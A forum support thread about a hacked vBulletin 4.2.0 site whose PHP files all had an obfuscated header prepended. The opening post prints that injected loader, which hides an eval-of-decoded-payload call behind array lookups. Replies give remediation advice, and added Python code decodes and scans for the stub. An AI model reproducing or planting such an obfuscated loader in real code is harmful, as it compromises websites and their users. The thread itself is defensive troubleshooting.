My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

    Hi all!
    My forum was hacked or similar. I can't use it because all PHP files were edited and ALL of them have this code added at the top:

    Code:
    <?php
    $md5 = "2a91cf451e08d33f50a63c22ad76930c";
    $af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
    $bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);
    $bf2('[encoded payload string not preserved]');
    ?>
    Please check for vulnerabilities!!!
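
The injected stub in the first post hides its one real instruction behind array lookups. As an added example (not part of the original post or of vBulletin), this Python snippet rebuilds that string statically, without executing any PHP; the function names and the `PAYLOAD_PLACEHOLDER` argument are constructed for illustration, and it assumes flat arrays of simple quoted literals with no escape sequences.

```python
import re

# Stub as posted in the thread; the payload argument is a constructed placeholder.
SAMPLE = r'''<?php
$md5 = "2a91cf451e08d33f50a63c22ad76930c";
$af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
$bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);
$bf2('PAYLOAD_PLACEHOLDER');
?>'''

LITERAL = re.compile(r'''\s*(?:"([^"]*)"|'([^']*)')\s*([,)])''')
ARRAY_START = re.compile(r'\$(\w+)\s*=\s*array\(')
CHAIN = re.compile(r'(?:\$\w+\[\d+\]\s*\.\s*)+\$\w+\[\d+\]')
ELEMENT = re.compile(r'\$(\w+)\[(\d+)\]')

def parse_arrays(src):
    """Return {name: [elements]} for every flat array of quoted strings."""
    arrays = {}
    for start in ARRAY_START.finditer(src):
        pos, items = start.end(), []
        # Consume one quoted literal at a time so ")" and ";" inside
        # quotes are not mistaken for the end of the array.
        while (m := LITERAL.match(src, pos)):
            items.append(m.group(1) if m.group(1) is not None else m.group(2))
            pos = m.end()
            if m.group(3) == ')':
                arrays[start.group(1)] = items
                break
    return arrays

def resolve_chains(src):
    """Rebuild each $arr[i].$arr[j]... string by lookup; never runs the PHP."""
    arrays = parse_arrays(src)
    out = []
    for chain in CHAIN.finditer(src):
        try:
            out.append(''.join(arrays[name][int(idx)]
                               for name, idx in ELEMENT.findall(chain.group(0))))
        except (KeyError, IndexError):
            out.append(None)  # refers to an array or index that was not parsed
    return out

if __name__ == '__main__':
    print(resolve_chains(SAMPLE))
```

The recovered body shows the stub is only a loader: whatever the injected code does lives in the encoded string passed to `$bf2`, which should be decoded offline rather than run.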

  • #2
    There is NOTHING in vBulletin that would allow for any file, let alone all files, to be edited. This is a server issue.



    • #3
      Yes, a server issue. Find how the server was accessed and fix it. Then move on to fixing the files. Best bet is to remove the infected files and reload.
      www.cdmagurus.com
      www.cellphone-gurus.com



      • #4
        Any suggestions to find it?



        • #5
          Originally posted by RedFoxy
          Any suggestions to find it?
          Ask your host for ftp logs.



          • #6
            Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools <- awesome site for html/css help



            • #7
              Originally posted by ericfahey
              Ask your host for ftp logs.
              I've no FTP

              Originally posted by Lynne
              Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.
              Looks like that's a vulnerability of php because I found other websites on my server with php edited

              - - - Updated - - -

              I looked for access by ssh but nothing, all logs are ok



              • #8
                Originally posted by RedFoxy
                I've no FTP

                Looks like that's a vulnerability of php because I found other websites on my server with php edited
                In that case ask your host to upgrade the PHP on their server. They should be using the latest version of it.

                To clean up your forum files, overwrite them with a fresh set from your version of vb, which you can download from your customer area. Also check your server space for anything out of the ordinary, such as files with malicious code left behind and things of that kind.



                • #9
                  It was harder to do it because it changed ALL .php files of all websites



                  • #10
                    Any modifications added? Look for vulnerabilities there.

                    The rest of the mod community would be very interested if you discover a bad mod.



                    • #11
                      Originally posted by RedFoxy
                      It was harder to do it because it changed ALL .php files of all websites
                      Some vulnerability on your server allowed them to upload a script somewhere. The script does a listing of all php files and adds its code to the top. This is pretty basic stuff in all reality. Not very difficult to do.

                      Even if you don't use FTP on the site they can get in via FTP if the daemon is running. They can get passwords from email, FTP, or telnet. Someone else on the server could upload a vulnerability. There could be problems in Apache, PHP, MySQL, Java or even the server kernel that needs to be updated. Quite a few hundred places to look on a typical server for vulnerabilities.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API - Full / Mobile
                      Vote for your favorite feature requests and the bugs you want to see fixed.
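
Post #11 describes a script that prepends its code to every PHP file it can list, so the first cleanup step is knowing exactly which files carry the header. The following read-only scan is an added example, not part of the thread or of vBulletin; the regex, function names and the temporary test tree (with an inert stub of nonsense letters) are constructed, and it assumes the header keeps the shape shown in post #1.

```python
import os, re, tempfile

# Shape of the prepended block in post #1: the file opens with <?php and, near
# the top, hands create_function() a body built from 5+ chained $arr[n] lookups.
INJECTED_HEAD = re.compile(
    rb'\A\s*<\?php\b.{0,2048}?create_function\([^;]{0,64}?'
    rb'(?:\$\w+\[\d+\]\s*\.\s*){5,}', re.DOTALL)

def find_injected(root, head_bytes=8192):
    """Return sorted relative paths of .php files whose head matches the stub."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:      # read-only; nothing is modified
                head = fh.read(head_bytes)
            if INJECTED_HEAD.match(head):
                hits.append(os.path.relpath(path, root).replace(os.sep, '/'))
    return sorted(hits)

def demo():
    """Build a constructed tree (inert stub, nonsense letters) and scan it."""
    stub = (b'<?php\n$md5 = "' + b'0' * 32 + b'";\n'
            b'$af = array("a","b","c","d","e","f","g");\n'
            b"$bf2 = create_function('$'.'v',$af[0].$af[1].$af[2].$af[3].$af[4].$af[5].$af[6]);\n"
            b"$bf2('PLACEHOLDER');\n?>")
    files = {
        'index.php': stub + b'<?php echo "home"; ?>',
        'inc/db.php': stub + b'<?php $dsn = "example"; ?>',
        'inc/clean.php': b'<?php $af = array("a"); echo $af[0]; ?>',
        'inc/legit.php': b"<?php $f = create_function('$x', 'return $x * 2;'); ?>",
        'notes.txt': stub,
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            path = os.path.join(root, *rel.split('/'))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, 'wb') as fh:
                fh.write(data)
        return find_injected(root)

if __name__ == '__main__':
    print(demo())
```

A hit list from every site on the server, together with file modification times, gives the host a time window to line up against the access logs requested earlier in the thread.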



                      • #12
                        There has been a browser plugin from Adobe which had exploits, and due to that it was possible to access FTP programs and transfer the site information + passwords to a third party. Check if you have your browser plugins updated and change all passwords to each FTP site.
                        No private support, only PM me when I ask for it. Support in the forums only.
